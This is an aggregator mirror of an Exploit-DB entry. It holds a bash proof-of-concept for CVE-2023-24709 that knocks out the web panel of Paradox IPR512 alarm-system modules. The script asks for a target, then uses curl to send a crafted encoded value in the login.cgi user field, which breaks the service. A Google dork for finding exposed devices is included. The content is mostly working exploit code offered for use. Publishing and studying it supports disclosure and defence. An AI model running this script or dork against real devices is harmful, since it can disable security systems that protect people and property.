4

[dos] Paradox Security Systems IPR512 - Denial Of Service

 1 year ago
source link: https://www.exploit-db.com/exploits/51356
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Paradox Security Systems IPR512 - Denial Of Service

EDB-ID:

51356

EDB Verified:

Exploit:

  /  

Platform:

Hardware

Date:

2023-04-10

Vulnerable App:

#!/bin/bash

# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
# Google Dork: intitle:"ipr512 * - login screen"
# Date: 09-APR-2023
# Exploit Author: Giorgi Dograshvili
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)
# Version: IPR512
# CVE : CVE-2023-24709

# Function to display banner message
display_banner() {
  echo "******************************************************"
  echo "*                                                    *"
  echo "*                PoC CVE-2023-24709                  *"
  echo "*      BE AWARE!!! RUNNING THE SCRIPT WILL MAKE      *"
  echo "*    A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!   *"
  echo "*                                by SlashXzerozero   *"
  echo "*                                                    *"
  echo "******************************************************"
}

# Call the function to display the banner
display_banner
  echo ""
  echo ""
  echo "Please enter a domain name or IP address with or without port"
read -p  "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
if [[ $confirm == "Y" || $confirm == "y" ]]; then
  # Display loading animation
  animation=("|" "/" "-" "\\")
  index=0
  while [[ $index -lt 10 ]]; do
    echo -ne "Loading ${animation[index]} \r"
    sleep 1
    index=$((index + 1))
  done

  # Use curl to send HTTP GET request with custom headers and timeout
  response=$(curl -i -s -k -X GET \
    -H "Host: $domain" \
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
    -H "Accept: */" \
    -H "Referer: http://$domain/login.html" \
    -H "Accept-Encoding: gzip, deflate" \
    -H "Accept-Language: en-US,en;q=0.9" \
    -H "Connection: close" \
    --max-time 10 \
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

  # Check response for HTTP status code 200 and print result
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
  else
    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"
  fi
else
  echo "The script is stopped!."
fi

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK